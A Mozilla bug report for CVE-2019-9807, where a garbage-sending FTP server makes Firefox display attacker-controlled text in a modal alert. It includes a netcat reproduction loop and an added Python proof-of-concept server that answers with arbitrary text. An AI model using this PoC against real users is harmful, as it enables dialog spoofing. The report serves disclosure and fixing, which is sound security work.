Closed Bug 1362050 (CVE-2019-9807) Opened 3 years ago Closed 1 year ago

FTP allows window modal alert box with attacker controlled input

(Core :: Networking: FTP, defect, P3)

Tracking Status
firefox65 --- wontfix
firefox66 --- fixed
firefox67 --- fixed

(Reporter: hanno, Assigned: Gijs)

(Blocks 1 open bug)

(Keywords: csectype-spoof, sec-low, testcase, Whiteboard: [necko-triaged][adv-main66+])

(1 file)

Attached file ftpalert.htm
When one sends garbage over FTP port 21, tries to access it via Firefox, and then tries to reload, it will create an alert box with the garbage as content.

I'm attaching a poc. Use it by first starting a dummy "garbage ftp server" on localhost with netcat:
while true; do echo "I can control your popup window content" | nc -l -p 21; done

And then open the html file.

I don't see why this behavior makes any sense. It seems to be some kind of error handling; however, it's missing any explanatory error message and just puts all content that came over the FTP port in an alert box. It allows bypassing restrictions of window modal alert boxes, which usually webpages shouldn't be able to control.

(In reply to Hanno Boeck from comment #0)
> It allows bypassing
> restrictions of window modal alert boxes, which usually webpages shouldn't
> be able to control.

What restrictions are you talking about? We still display realm information on http auth dialogs (as do most browsers, I believe), and per-window-modal (rather than tab-modal) dialogs for alert(), prompt() etc. are only a pref flip away (and there are reasons you might want to flip that pref, such as bug 727801).

I'm not convinced there's a realistic security vulnerability here that needs to stay hidden, but I'll leave the decision up to Al & Dan & co.

Also: maybe a dupe of (public) bug 1282430? Hard to tell.
Group: firefox-core-security → core-security
Component: Security → Networking: FTP
Product: Firefox → Core
This isn't the http auth dialog, it's a 2000-era modal window so it's potentially a bypass of alert-abuse prevention and maybe a bypass on the restrictions against sandboxed frames popping up alerts.
Group: core-security → network-core-security
Can't reproduce with the test case.
Whiteboard: [necko-backlog]
(In reply to Honza Bambas (:mayhemer) from comment #3)
> Can't reproduce with the test case.

Hanno, it seems you missed this comment a month ago.
Can you re-test?
Flags: needinfo?(hanno)
It seems the JavaScript reproducer doesn't work very reliably.

However there is a reliable way to reproduce this "manually":

1. Run the nc "fake ftp server":
while true; do echo "I can control your popup window content" | nc -l -p 21; done

2. Call ftp://localhost/
Firefox will try to load it.

3. Go into the URL bar and press enter again.

This always works for me. It is probably possible to get a more reliable way in JavaScript to simulate this. But the main point should be obvious: Firefox sometimes creates alert boxes with random content coming from the server and without any explanation. That surely doesn't seem like correct behavior.
Flags: needinfo?(hanno)
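The "garbage FTP server" used in comment 0 and in the manual reproduction steps above is a netcat loop that answers every connection with one attacker-chosen line and no FTP reply code. Below is an added example (written for this page, not part of Hanno's attachment or of any Firefox code) that does the same job as a small Python script: it listens on a chosen port, hands every client the raw text, records whatever the client sent back, and includes a helper that checks whether a line even looks like an RFC 959 reply (three-digit code followed by a space or hyphen). The default port, the host address, the 0.5 s read timeout and the sample payload are assumptions chosen for the example; the payload is the string from the original PoC.

```python
import socket
import sys
import threading

# Constructed sample payload: the line from the original PoC. Any text works;
# the point is that it carries no three-digit FTP reply code.
DEFAULT_PAYLOAD = "I can control your popup window content"


def make_response(text: str) -> bytes:
    """Build the exact bytes the nc loop would send: the text plus a line end,
    with no status code, so an FTP client cannot parse it as a reply."""
    return (text + "\r\n").encode("utf-8")


def looks_like_ftp_reply(line: bytes) -> bool:
    """RFC 959 replies start with a three-digit code followed by ' ' (final
    line) or '-' (continuation line). Garbage fails this check."""
    return len(line) >= 4 and line[:3].isdigit() and line[3:4] in (b" ", b"-")


class GarbageFtpServer:
    """Accepts TCP connections and answers each with the attacker-controlled
    payload, mirroring: while true; do echo "..." | nc -l -p 21; done"""

    def __init__(self, host="127.0.0.1", port=21, payload=DEFAULT_PAYLOAD):
        self.payload = payload
        self.log = []  # (peer address, bytes the client sent) per connection
        self._stop = threading.Event()
        self._thread = None
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        # Short accept() timeout so stop() can be honoured promptly.
        self.sock.settimeout(0.2)
        # port=0 lets the OS pick a free port; read back whatever was bound.
        self.port = self.sock.getsockname()[1]

    def _handle(self, conn, addr):
        with conn:
            conn.sendall(make_response(self.payload))
            conn.settimeout(0.5)  # assumption: clients reply quickly or not at all
            try:
                data = conn.recv(1024)
            except socket.timeout:
                data = b""
            self.log.append((addr, data))

    def serve_forever(self):
        while not self._stop.is_set():
            try:
                conn, addr = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            self._handle(conn, addr)
        self.sock.close()

    def start(self):
        self._thread = threading.Thread(target=self.serve_forever, daemon=True)
        self._thread.start()

    def stop(self):
        self._stop.set()
        if self._thread is not None:
            self._thread.join(timeout=2.0)


def fetch_banner(host: str, port: int, timeout: float = 2.0) -> bytes:
    """Minimal client: connect and return the first bytes the server sends.
    This is what Firefox reads on the control connection before it can parse
    a reply code."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(4096)


if __name__ == "__main__":
    # Usage: python garbage_ftp.py [port]   (port 21 needs root; then load
    # ftp://localhost/ in the browser and press Enter in the URL bar again)
    listen_port = int(sys.argv[1]) if len(sys.argv) > 1 else 21
    server = GarbageFtpServer(port=listen_port)
    print("serving %r on port %d" % (DEFAULT_PAYLOAD, server.port))
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        server.stop()
```

Run it on an unprivileged port (for example 2121) and point the browser at ftp://localhost:2121/ if binding to 21 is not possible; `looks_like_ftp_reply` is the check a client would need to pass before treating a control-connection line as a status message rather than as opaque text.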
I could verify the test case reproduces reliably. Back to Honza
Flags: needinfo?(honzab.moz)
Keywords: testcase
Jason, could you please find an owner?  I'm not sure who is responsible for the FTP code these days.  Thanks.
Assignee: nobody → jduell.mcbugs
Flags: needinfo?(honzab.moz)
Given that there's no visible activity on fixing this and it's been open several months I intend to disclose this bug within a week.
Priority: -- → P3
Whiteboard: [necko-backlog] → [necko-triaged]
Assignee: jduell.mcbugs → nobody
Duplicate of this bug: 1519521

Someone filed a dupe and there's a public blogpost, should we open this up to increase the chance someone might provide a patch?

Flags: needinfo?(dveditz)
Group: network-core-security
Flags: needinfo?(dveditz)

Fixed in bug 1523249.

Assignee: nobody → gijskruitbosch+bugs
Closed: 1 year ago
Resolution: --- → FIXED
Whiteboard: [necko-triaged] → [necko-triaged][adv-main66+]
Alias: CVE-2019-9807